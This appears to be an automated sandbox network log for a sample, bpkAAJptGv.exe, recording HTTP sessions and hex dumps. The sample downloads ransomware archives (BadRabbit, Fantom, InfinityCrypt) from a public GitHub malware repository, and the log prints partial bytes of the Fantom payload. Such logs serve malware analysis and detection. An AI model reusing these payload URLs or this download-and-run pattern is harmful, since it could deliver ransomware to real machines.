                                                                                                                                                            Date: Thu, 29 Sep 2022 12:44:08 GMT
                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                            Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                            Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                            Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/Fantom.zip
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                            X-Frame-Options: deny
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                            Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                            Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                            2022-09-29 12:44:48 UTC914INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                            Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            2192.168.2.649709140.82.121.4443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:44:42 UTC1OUTGET /Endermanch/MalwareDatabase/raw/master/ransomwares/BadRabbit.zip HTTP/1.1
                                                                                                                                                            Host: github.com
                                                                                                                                                            Connection: Keep-Alive


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            20192.168.2.649718185.199.110.133443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:44:48 UTC915OUTGET /Endermanch/MalwareDatabase/master/ransomwares/Fantom.zip HTTP/1.1
                                                                                                                                                            Host: raw.githubusercontent.com


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            21185.199.110.133443192.168.2.649718C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:44:48 UTC915INHTTP/1.1 200 OK
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Length: 203087
                                                                                                                                                            Cache-Control: max-age=300
                                                                                                                                                            Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                            Content-Type: application/zip
                                                                                                                                                            ETag: "0f6cd0c854741d82e79b6fae3ecfc41f9b92740bab354e2ee252955917725cf0"
                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            X-Frame-Options: deny
                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                            X-GitHub-Request-Id: 0846:E4BC:5E09CA:68A9EF:63359324
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            Date: Thu, 29 Sep 2022 12:44:48 GMT
                                                                                                                                                            Via: 1.1 varnish
                                                                                                                                                            X-Served-By: cache-mxp6942-MXP
                                                                                                                                                            X-Cache: HIT
                                                                                                                                                            X-Cache-Hits: 1
                                                                                                                                                            X-Timer: S1664455489.680245,VS0,VE1
                                                                                                                                                            Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                            X-Fastly-Request-ID: be809e6e1cf5e450489690c48e2857b88d32500f
                                                                                                                                                            Expires: Thu, 29 Sep 2022 12:49:48 GMT
                                                                                                                                                            Source-Age: 28
                                                                                                                                                            2022-09-29 12:44:48 UTC916INData Raw: 50 4b 03 04 14 00 01 00 08 00 64 01 cd 4c 5a 74 a2 37 b5 18 03 00 00 16 04 00 0a 00 00 00 46 61 6e 74 6f 6d 2e 65 78 65 22 e7 f0 5b 88 6d 31 c8 1f 0b 7d 88 55 e3 33 f2 2a 91 e5 3a 5c 0e c4 5d 37 ee df 6e 5b a7 3d 5a a3 07 6d 88 45 a4 dc 8e 0a a0 0d 92 93 68 24 00 5c 40 19 4d 80 d5 9b c0 88 7e f4 e8 b1 12 2b e0 d8 eb 5f 40 26 3d 64 73 cf d8 7a 1d c8 74 62 56 d5 b5 6b bc c5 66 0c a3 c2 21 35 45 5c c6 a6 10 d6 9a 5f 61 cd b8 bd e2 41 ee 82 d1 88 dd bf 72 be cc b3 c5 72 36 49 19 d7 76 d2 2d 53 e4 de 95 e6 c9 b4 f0 49 f6 d6 ba f6 d0 5f a3 e9 83 90 3f 14 c4 e8 e9 a9 62 03 42 67 dc d3 0d 07 9f 7e 98 1e 50 4b b2 7a 2c 80 44 b5 9f 42 81 88 d5 88 42 ab ab 3c d2 27 98 7c df c6 d3 8e 82 7a 18 17 a0 bc c6 4a cf 60 40 eb 61 1b d0 ed 8e 15 2f 5e 30 68 c8 39 9a 73 d2 34
                                                                                                                                                            Data Ascii: PKdLZt7Fantom.exe"[m1}U3*:\]7n[=ZmEh$\@M~+_@&=dsztbVkf!5E\_aArr6Iv-SI_?bBg~PKz,DBB<'|zJ`@a/^0h9s4
                                                                                                                                                            2022-09-29 12:44:48 UTC932INData Raw: a2 90 f1 46 bd fa 58 76 14 cd 39 d7 85 92 02 85 20 c3 a5 98 83 22 ac 3c b8 93 ee 3f 06 5b 64 5f b0 0c eb e1 e3 a5 a6 2b 68 80 fb 5b 2f 0f 95 bb 70 e3 1d 8e 28 9b 78 6c ba 2d 60 71 44 86 6f 76 07 25 d1 ef eb 8c 2b 1d 4c c0 53 c8 17 82 29 49 06 eb c6 5d 2e 98 11 c9 d8 bc 0d 27 9a a0 13 b1 2a 77 e5 ae 3f 34 60 eb 84 cb fd 7b cd 9f 8c e6 3f 35 1d fc 80 ba ad 47 35 df 12 2b d5 d6 9b 0f d0 ba fd 51 2f 9a 54 d6 cc 3b 75 51 07 c2 4a 7f a1 b2 0a de da a0 b8 20 8f 36 4d 04 24 18 df 1f f0 d6 91 ee 78 45 5c e7 a1 17 e6 c1 bc 2f 3d 69 11 d8 2e fa 97 c2 c9 23 fb dd a1 75 52 9a fc bf 3d c5 a7 a1 74 56 d5 13 99 ec 6e 2d 44 fd a4 f8 9b 4a a1 ab 49 52 84 a0 09 01 cf 73 86 ef fb e7 17 2c b0 2f 55 4d 2e 15 ff 85 43 f4 16 6d 79 9b 3d 8a e5 3d 9e 75 7e 90 f8 0f 0e 8c f1 ac 61
                                                                                                                                                            Data Ascii: FXv9 "<?[d_+h[/p(xl-`qDov%+LS)I].'*w?4`{?5G5+Q/T;uQJ 6M$xE\/=i.#uR=tVn-DJIRs,/UM.Cmy==u~a
                                                                                                                                                            2022-09-29 12:44:48 UTC948INData Raw: 36 e4 b1 70 fd 30 bb 38 60 29 ff 0a 44 f9 e2 73 29 69 fb 52 3d ce da a5 e8 4c c0 f8 99 bd 9e 00 33 88 da b4 e2 01 07 5f de 97 88 36 37 86 35 bb 23 1f 45 31 0c 13 a1 2c 43 ec 79 4f d1 f9 4f ba 28 af 31 aa d6 c4 5b d4 62 dd 91 ed cc ff cd 8b 23 77 90 b4 9b b3 5a 2e c7 43 d1 2b b5 89 27 65 53 29 22 8f 00 36 0e a2 b0 5f 07 43 4b 16 8c 64 7a 49 d7 a5 17 89 89 cc 3f 61 f9 3a a9 cd 0a b0 4d ca c3 ad b5 f6 fd d0 18 08 85 c3 24 b2 29 bd 0d 73 1f 82 38 04 50 3e f3 a8 56 e9 ba 13 85 d3 3a a2 09 a8 b8 4c a3 16 be 50 b7 17 dc 34 b3 39 b0 61 b4 f2 ca cf fa 88 64 02 5e 36 7b f4 32 f7 02 93 5d 35 d7 35 74 36 2d 73 28 4c 2d 44 ec 80 0c 76 23 85 47 15 67 0a a7 6e 78 62 62 2e 0f fa 9e af de 4f 81 bb 14 f9 50 0e 98 d9 a8 54 2c 41 35 ad a5 70 54 f0 34 51 cc 3c 48 1f 2f 68 3d
                                                                                                                                                            Data Ascii: 6p08`)Ds)iR=L3_675#E1,CyOO(1[b#wZ.C+'eS)"6_CKdzI?a:M$)s8P>V:LP49ad^6{2]55t6-s(L-Dv#Ggnxbb.OPT,A5pT4Q<H/h=
                                                                                                                                                            2022-09-29 12:44:48 UTC964INData Raw: f7 ca 9f 68 9f 77 7a 4b b6 b8 bd 7a 98 56 4a b2 f5 fb 1b e3 6c 6c 54 3e 51 a7 92 47 0d e8 be dc 62 0d c9 14 fe 99 95 d5 2b ec da f5 08 0c 37 f2 bc 15 93 91 91 06 51 54 86 7c fa db 9c 66 45 3f 23 ec 33 7b b5 25 75 f8 f4 f8 3a 9d 91 88 90 9c 39 b5 16 e3 ce 06 76 64 23 08 a3 25 d2 c7 df 88 68 95 ca 69 a0 12 50 07 d2 6a 73 dc 01 f9 d1 54 b2 4d 12 7c 1d a5 69 ac e1 62 3a 2c 25 d7 b2 cc 23 dd 02 aa 9b d1 7a 02 a1 ea 77 bc ed 0d 7b ad 17 d7 88 63 59 5b 16 cd 41 66 0e 7d b5 56 ce 8e 6e ab 8d fd 0f 82 7e 25 2f 4d a4 53 1e 57 3f b6 f7 19 32 b7 27 43 58 4e 1b d6 ed 40 3d ec 89 fa d6 37 0a 6e 0b d7 1e 49 8f 0a 51 a2 20 67 c5 56 aa 6a cf fc b0 1c 60 d0 43 ab bc a6 d8 d7 83 7a 97 3a 04 74 bc cd 3c 18 c8 70 29 b1 62 fc 0f 2f ef 59 d6 04 28 81 db f5 b2 41 85 2d 3c 5c 9a
                                                                                                                                                            Data Ascii: hwzKzVJllT>QGb+7QT|fE?#3{%u:9vd#%hiPjsTM|ib:,%#zw{cY[Af}Vn~%/MSW?2'CXN@=7nIQ gVj`Cz:t<p)b/Y(A-<\
                                                                                                                                                            2022-09-29 12:44:48 UTC980INData Raw: b3 da c4 0b 4e 18 b8 c8 2b 82 33 11 8e 62 a0 80 88 7d 29 f1 94 3c b8 c5 d7 92 d3 99 4b d6 e8 38 7d f2 69 00 25 b7 79 48 07 f8 66 9e ad dd e8 65 39 74 62 37 4c 40 b6 03 26 55 92 56 40 3c 30 87 bd 26 fd c8 df 72 0b 76 5d e5 d7 14 af 68 25 58 71 1d 10 cd fa 13 01 d6 ad 31 e8 46 43 75 9b 4d cd f8 0f 07 bd 24 89 61 f4 c0 43 a7 b5 66 b4 0c a9 c9 2f 15 a1 c6 3e 76 01 c3 9a 76 48 37 20 5a f9 c3 6f d8 1d 6a 41 b5 b5 7e 5f 68 b3 c9 d5 c9 a3 8e d4 91 b0 2f 22 9e 6c 7f ea a5 94 ff 8d eb 41 68 9f 5d 21 37 e7 99 4e ee 29 04 88 4e 41 7e 7e a3 be 9c 27 7c 5e 5c 9c ba b5 91 03 5f 7c ef be b8 80 fd ae 0a 89 54 23 b9 2d 83 e8 05 88 ed 0d 58 fd 73 31 0b 4a a5 c6 91 9e 71 11 ee bd ec 3c 22 25 78 2d 03 93 b4 ae 20 3b 7c 4d ee 34 c8 b0 be f9 62 79 36 7b 14 ca a6 78 b6 e4 4f f2
                                                                                                                                                            Data Ascii: N+3b})<K8}i%yHfe9tb7L@&UV@<0&rv]h%Xq1FCuM$aCf/>vvH7 ZojA~_h/"lAh]!7N)NA~~'|^\_|T#-Xs1Jq<"%x- ;|M4by6{xO
                                                                                                                                                            2022-09-29 12:44:48 UTC996INData Raw: 61 4e c7 47 9e e5 9b 30 91 54 a4 85 b6 1f 92 57 cf c6 1d 2b 69 88 1d 52 bf 6d 4e 08 53 ef fb 76 d1 2c f2 9c 69 29 d4 7d 53 35 a0 b5 54 b2 6c 3c 50 13 f0 f3 8e 36 ec d1 85 20 82 99 a4 13 16 e8 e7 b0 af 35 80 b2 b5 85 e4 53 5c d2 1f ff 65 d3 19 50 29 d3 33 70 4e 2a 45 60 de 06 be 27 5b 83 76 d0 75 20 cd 41 9b 7b 41 6c a1 52 09 ff 01 97 f1 5e 76 50 54 73 0d 93 c9 49 a0 fd e4 57 3c 42 e8 b8 23 75 a0 69 68 e7 fd eb c5 d4 3b e9 30 f3 eb c8 25 d5 cf 1e 5a 24 77 83 5d d9 16 cf 2d c8 b0 45 ed 9a 4b e2 25 91 17 41 fb 75 98 b2 8c 30 a7 48 3f 25 c9 84 3f a3 54 4a a9 34 d5 7f a5 1b e3 0f c4 e2 a4 e3 07 4d 1b 5f 26 e3 34 c5 8e d2 b0 ba eb 13 dd 71 7e 15 b6 59 0b 74 93 82 fc 1a 98 33 e3 ed 9a 14 85 2b 1d 69 36 fb af 4d b0 11 00 89 bc 2e da fd b3 dc ae 14 9d 5b 6c 42 8c
                                                                                                                                                            Data Ascii: aNG0TW+iRmNSv,i)}S5Tl<P6 5S\eP)3pN*E`'[vu A{AlR^vPTsIW<B#uih;0%Z$w]-EK%Au0H?%?TJ4M_&4q~Yt3+i6M.[lB
                                                                                                                                                            2022-09-29 12:44:48 UTC1012INData Raw: 6e fa b8 b4 61 ca 74 9c a2 d0 e7 18 87 66 65 47 48 4b da f8 bb 2d fd 93 4e 9d b1 f6 39 3e 75 68 5c f7 e5 e8 7d 68 4e 84 11 b9 87 be 6b b1 fb 30 39 11 b2 24 1b 2d c8 38 62 64 d9 4a 31 7a f2 81 66 58 09 7a fb 45 57 de 85 77 3b 1f 87 d3 2e f9 f3 33 f2 95 dd 14 01 bd 82 59 3d 02 2c 11 8b c8 b5 ba b3 fe 58 8b 2b 3c 70 cc ed 19 e4 8b 75 4d 5f 52 a3 82 37 54 bb f6 2d 06 7e 25 ac 5f 2a 34 7f 47 c7 19 0e 06 5d fd 72 2a 62 b2 99 f5 40 8d 5c 43 db 3b 4f 0a bb 28 6f a3 a4 be e7 0b c6 95 c4 88 db 69 a9 a2 68 a7 07 79 ae b4 7d 35 c1 78 3d 09 35 fb 6f de 1f e8 82 c2 8e ab 16 68 82 aa 41 51 92 b9 f3 03 e5 bf 7a 7e 92 9b 3c 6f fb 1e 78 64 41 27 55 c5 e6 32 84 0e d4 94 49 5a 91 88 2b cc 59 f8 34 e4 ec 13 86 3e 84 6a ac 76 52 7a c1 84 b3 68 d8 3d 4b 54 98 3e 19 f3 b3 77 cf
                                                                                                                                                            Data Ascii: natfeGHK-N9>uh\}hNk09$-8bdJ1zfXzEWw;.3Y=,X+<puM_R7T-~%_*4G]r*b@\C;O(oihy}5x=5ohAQz~<oxdA'U2IZ+Y4>jvRzh=KT>w
                                                                                                                                                            2022-09-29 12:44:48 UTC1028INData Raw: 7b 37 ef f6 42 d9 c9 2a 42 ff 02 7d 31 24 af e4 1f 5e 76 23 bf 86 c3 af 69 f7 e9 02 bb a3 85 49 7f 70 26 d4 da e4 4d 70 23 fd 85 9d 1a fc 7a 60 9e 50 e6 74 20 7d fe 68 b1 5f 1e 58 c6 0f 62 31 83 48 ba bb 07 96 47 f0 67 2b ae aa 74 a8 a0 66 60 92 6d c3 70 d6 6b ec 8b 5d 29 00 d0 8a 43 25 b1 49 eb 4d b2 34 26 22 c4 4c a3 e3 63 af f2 b2 22 81 c1 e8 53 0b 89 b8 2b 5e b8 1e 67 4f 27 6e ef 51 c5 bd db 82 a1 b9 82 96 27 a8 d2 31 34 e3 a2 63 1e 23 51 09 77 39 fa 06 d8 d1 33 41 46 e9 93 a0 16 d9 04 5d df 15 d0 13 44 72 2d 18 08 95 25 be c2 e2 4e 7b 4c 8b 9f 4e 49 77 1a 86 8c 7f 63 7c f0 f3 10 0b a4 2a 92 6f 10 46 42 6e 96 e5 56 db e5 c6 33 d4 b3 a0 ac a7 36 a2 8f 8d 44 b0 6b 5c 4a b0 63 73 cf 45 eb af 03 39 06 67 13 7c 5c b6 a1 48 d8 34 97 9e 26 fb 05 48 20 d1 32
                                                                                                                                                            Data Ascii: {7B*B}1$^v#iIp&Mp#z`Pt }h_Xb1HGg+tf`mpk])C%IM4&"Lc"S+^gO'nQ'14c#Qw93AF]Dr-%N{LNIwc|*oFBnV36Dk\JcsE9g|\H4&H 2
                                                                                                                                                            2022-09-29 12:44:48 UTC1044INData Raw: 61 5c 56 85 15 75 56 0d 28 0a a8 3e e5 91 d0 cd 62 be 20 cf f2 27 2a 72 84 76 12 73 55 fa 5d b2 6c 6d 04 58 8f 9c 31 e3 4d a4 aa f3 6b 73 16 0e ba a1 7a 9b 2e 49 81 ea ce ec 58 7b 88 cb f6 98 43 b5 75 54 e0 2d 1d 64 f8 f6 50 4b 2f f9 fc 59 be d6 6f 06 f6 6c 80 e2 6c 59 5d 76 bd 01 ca a7 28 7c 39 00 8b 07 ad 9e 72 09 f2 e2 fa af c7 fa 86 cc 37 a1 72 aa 8d f9 19 d3 9b 89 39 5a c8 dc 13 89 2f 0d 47 32 93 35 67 47 17 df 64 76 dc cb 44 0c 72 ce 2f ea 1f 3e a9 19 20 b2 95 f5 39 09 25 f8 90 2d e7 1a 8f f4 4e b5 81 cf fb 88 da cf 4b 4d d8 d3 2a 0b cc 5f e8 91 d1 d4 18 c6 81 bb a1 9a 47 87 9b 1c 3a a4 7c 37 a1 fc 31 7c 3f 50 7d b2 38 57 56 f9 18 81 e5 0c 60 5b 17 62 a0 20 98 4c 51 dc fa 20 32 af 70 9b 80 a5 b0 da 1d 51 ae a8 41 42 43 21 18 81 10 10 cd 3e c4 1c 94
                                                                                                                                                            Data Ascii: a\VuV(>b '*rvsU]lmX1Mksz.IX{CuT-dPK/YollY]v(|9r7r9Z/G25gGdvDr/> 9%-NKM*_G:|71|?P}8WV`[b LQ 2pQABC!>
                                                                                                                                                            2022-09-29 12:44:48 UTC1060INData Raw: 8c fe 89 e4 2b f9 70 2a ff 4e b6 22 b7 de 84 2e 21 f3 4c bd b9 99 07 a1 48 89 9b c1 33 25 01 e2 43 77 35 d2 e6 25 7e be 24 50 ec 49 a7 d6 74 ac e8 20 5b a2 55 45 0b 58 5b 84 bd 06 c6 c0 7a d7 f6 70 8a b9 78 e4 94 35 ee 4f 09 37 4a e7 a9 ba 2c de 19 79 8d 25 1f c8 de 55 7a f7 e5 7a 21 cf e9 f5 34 56 9f e8 db c6 7a e1 54 03 d4 6b 9b 59 03 d7 20 3d 15 b7 74 7a 00 cf 76 4c 46 bf 36 41 7d 56 7b 80 54 7c ef 07 ac 79 5f f9 6d 2b f4 11 d3 25 d0 37 36 0d 5a 5e 54 0e a2 aa ee cc 0e 3f db 50 6a 9e 43 ba 4c 11 e2 83 9f a9 b8 4c 25 aa 7a 60 8b 5c 6e 5e 7c 4a 0b 2f f2 7c 2d 59 e1 28 9a ab 30 10 ed 78 f9 12 02 0d 0d fd f8 e3 df 3b 0b 33 59 54 ed 98 c7 ce a0 bc 83 7d 76 5b 4a 50 5a f2 a9 6d 92 4e be 0f 8e 72 ab fe 7f b3 45 41 58 77 2b 5e 84 6f c8 d8 a5 6d 52 1d 26 10 11
                                                                                                                                                            Data Ascii: +p*N".!LH3%Cw5%~$PIt [UEX[zpx5O7J,y%Uzz!4VzTkY =tzvLF6A}V{T|y_m+%76Z^T?PjCLL%z`\n^|J/|-Y(0x;3YT}v[JPZmNrEAXw+^omR&
                                                                                                                                                            2022-09-29 12:44:48 UTC1076INData Raw: 6b d5 a8 7c 2f 7e 0e 46 3f 5e ce 1f a3 5e 1b e0 6e 4a 8d 5b 57 74 c5 16 e4 e4 aa 20 45 9a 25 86 64 ce 6e bb 65 85 d2 f6 ac d0 e3 54 cf bb b2 80 07 e8 94 28 f1 00 57 b3 a3 a7 9f 07 88 d2 94 90 38 f7 4c 66 af 43 cd f3 64 25 28 73 27 9b 7c be 6f d9 a1 91 a5 ce 8c a8 d3 63 d5 51 40 e3 1a 59 64 1e 9f 40 f1 9d 5d d3 95 61 45 03 f3 c3 3e 0d 6d 2c b0 17 78 7d 39 16 0f 3e b7 16 a5 fa 17 09 44 d8 e9 e1 09 0a 87 ef 9d b2 de 6e 16 74 82 97 ad 08 03 e1 77 bc aa fc 85 d9 bb a4 f7 9f 96 67 e0 22 d1 77 43 14 81 ed 61 8f 13 aa a0 9b e3 4b 0d c4 38 78 ec 8d bf 7f e0 ba 63 37 93 b4 be 1d c2 6c 65 71 e7 a7 8a 10 2b 36 30 46 e2 8d 4a 79 4c 9f 09 a6 d1 bd 89 57 0c 03 d9 de 6b 97 c9 02 48 cf 2d c6 b9 77 c9 d7 6b 52 0c 0a 2f 9b a2 3b 0a 6a 74 96 b7 1a 16 cd 05 d0 5f 3c f9 f1 75
                                                                                                                                                            Data Ascii: k|/~F?^^nJ[Wt E%dneT(W8LfCd%(s'|ocQ@Yd@]aE>m,x}9>Dntwg"wCaK8xc7leq+60FJyLWkH-wkR/;jt_<u
                                                                                                                                                            2022-09-29 12:44:48 UTC1092INData Raw: ee c8 2c b0 ea eb 54 54 19 e5 26 0c 7b 5d 9f 97 86 2e 93 32 e4 35 a7 13 b5 7d c3 72 15 68 c0 31 75 eb e8 e5 a4 1c aa 5e fa c2 9e 0a e7 2e 95 6f 23 5f 5a aa d3 6a 70 11 a3 71 0c be ab af 17 53 cf d7 1b bf 1d 85 f5 51 34 66 32 ed 3a 8c 57 8f bb d3 60 60 21 50 73 c6 d2 12 65 a5 1e 09 2e 32 35 e5 62 70 b9 64 b2 56 95 dc 09 19 87 e6 ad 81 fa 25 98 10 00 8f ce 56 e6 39 c5 c9 3c a9 d4 39 e5 d9 a8 ed f7 d7 2a 12 05 54 f0 12 3e 8e c5 cf d4 06 c3 35 9a 9e b0 12 68 fe 51 76 8a c4 bd bd 13 47 7e 93 0f 6f d3 20 2c bc 3d 09 1f 13 5d 69 12 1c 67 6d 26 99 93 e8 e4 14 e4 12 8f eb d3 d6 76 14 e3 ad 43 81 90 8e f9 87 04 33 83 f6 7d 55 67 f0 ef 5f d1 56 fa d0 39 b6 f5 ec 03 6a 88 c8 29 10 4b 12 a3 dd 66 1b d9 d4 5c 4c 45 12 d7 dc 31 f6 d6 bf 94 29 09 83 59 4d e7 40 0b 94 d6
                                                                                                                                                            Data Ascii: ,TT&{].25}rh1u^.o#_ZjpqSQ4f2:W``!Pse.25bpdV%V9<9*T>5hQvG~o ,=]igm&vC3}Ug_V9j)Kf\LE1)YM@
                                                                                                                                                            2022-09-29 12:44:48 UTC1108INData Raw: 4b 8d cd fe 11 d2 6f 92 44 9c 02 47 4e 1b ed c1 63 0b 57 90 24 e5 3c 9d bc 23 d3 14 4f d5 54 d1 46 82 fb 73 88 b5 ce 15 eb 6f a1 10 b2 a5 a2 98 76 69 d4 e0 33 04 bc e2 ba 44 87 53 fa c6 02 96 ad 7e 25 24 3e 27 ff ac 19 4c cc b4 38 db 57 b7 3f ee 38 92 4c bd 7a 6d e1 37 4f 62 d6 40 0e 9d a9 9e 39 cd b1 22 62 af 22 d5 6a 20 e6 84 10 8d 01 c1 50 f2 a6 e4 fa 0a ec 68 45 63 fe e2 0a c5 17 38 18 8b 13 02 8b 8e e8 84 5a c0 89 0b 2a 67 d2 1f b5 e3 46 1a 9d 98 0f a5 9e 1a 56 c6 17 a1 7a 1c a2 04 75 41 23 59 ff cc 07 bc 2f 4e 74 7e 7a 01 98 a2 4a 15 b9 ab 74 ff c6 60 2e 26 50 5e 78 62 0f 83 0d a4 fd 1f fe e3 e1 4e 53 e1 87 44 b0 b0 86 d8 d4 3b 91 9e a7 cc 3a 27 54 b6 bd 57 d0 96 05 06 aa 46 fe 7f 8b 73 05 d2 ba 7d 65 77 ca ae c7 35 8b 1b 83 99 15 36 bf 18 26 ec 95
                                                                                                                                                            Data Ascii: KoDGNcW$<#OTFsovi3DS~%$>'L8W?8Lzm7Ob@9"b"j PhEc8Z*gFVzuA#Y/Nt~zJt`.&P^xbNSD;:'TWFs}ew56&


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            22192.168.2.649719140.82.121.4443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:44:48 UTC1115OUTGET /Endermanch/MalwareDatabase/raw/master/ransomwares/InfinityCrypt.zip HTTP/1.1
                                                                                                                                                            Host: github.com


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            23140.82.121.4443192.168.2.649719C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:44:48 UTC1115INHTTP/1.1 302 Found
                                                                                                                                                            Server: GitHub.com
                                                                                                                                                            Date: Thu, 29 Sep 2022 12:44:09 GMT
                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                            Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                            Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                            Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/InfinityCrypt.zip
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                            X-Frame-Options: deny
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                            Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                            Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                            2022-09-29 12:44:48 UTC1115INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                            Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            24192.168.2.649720185.199.110.133443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:44:48 UTC1117OUTGET /Endermanch/MalwareDatabase/master/ransomwares/InfinityCrypt.zip HTTP/1.1
                                                                                                                                                            Host: raw.githubusercontent.com


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            25185.199.110.133443192.168.2.649720C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:44:49 UTC1117INHTTP/1.1 200 OK
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Length: 34300
                                                                                                                                                            Cache-Control: max-age=300
                                                                                                                                                            Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                            Content-Type: application/zip
                                                                                                                                                            ETag: "560b96c943fc1b2cc0e25aa37950118e12457060c5829c2b558cdd36323f6802"
                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            X-Frame-Options: deny
                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                            X-GitHub-Request-Id: 0802:540B:2BBD66:3824C3:6335932B
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            Date: Thu, 29 Sep 2022 12:44:48 GMT
                                                                                                                                                            Via: 1.1 varnish
                                                                                                                                                            X-Served-By: cache-mxp6927-MXP
                                                                                                                                                            X-Cache: HIT
